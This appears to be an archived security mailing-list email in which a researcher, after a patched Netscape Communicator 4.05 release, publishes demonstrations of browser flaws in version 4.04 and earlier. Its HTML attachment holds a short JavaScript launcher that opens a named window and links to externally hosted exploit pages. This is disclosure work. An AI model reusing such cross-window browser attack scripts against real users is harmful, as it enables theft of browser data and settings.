This is a multi-part message in MIME format. --------------C3265FC716C909831247B1CC Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Hi, A few weeks ago, I've posted in this mailing-list an advisory about issues in Netscape Communicator. Since a fixed release (4.05) is now available to users, I think I can publish the exploits themselves. If you received this mail in Communicator 4.04 or previous (NN2.x and 3.x are not vulnerable), simply click the links in the attached HTML document for a demonstration of the bugs. _______________________________________________________________________ Fernand PORTELA aka Nando fernand.portelaat_private nandoat_private http://www.mygale.org/~nando --------------C3265FC716C909831247B1CC Content-Type: text/html; charset=us-ascii; name="attacks.html" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="attacks.html" <html> <head> <script><!-- function load_page() { w = window.open( '', 'prefs' ); w.origin = window.document.URL; } //--></script> </head> <body> <p>Click <a href="http://www.mygale.org/~nando/prefs3/" target="prefs" onClick="load_page()">here</a> for a demonstration of the first exploit. <p>Click <a href="http://www.mygale.org/~nando/prefs4/" target="prefs" onClick="load_page()">here</a> for a demonstration of the second exploit. </body> </html> --------------C3265FC716C909831247B1CC--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:48:47 PDT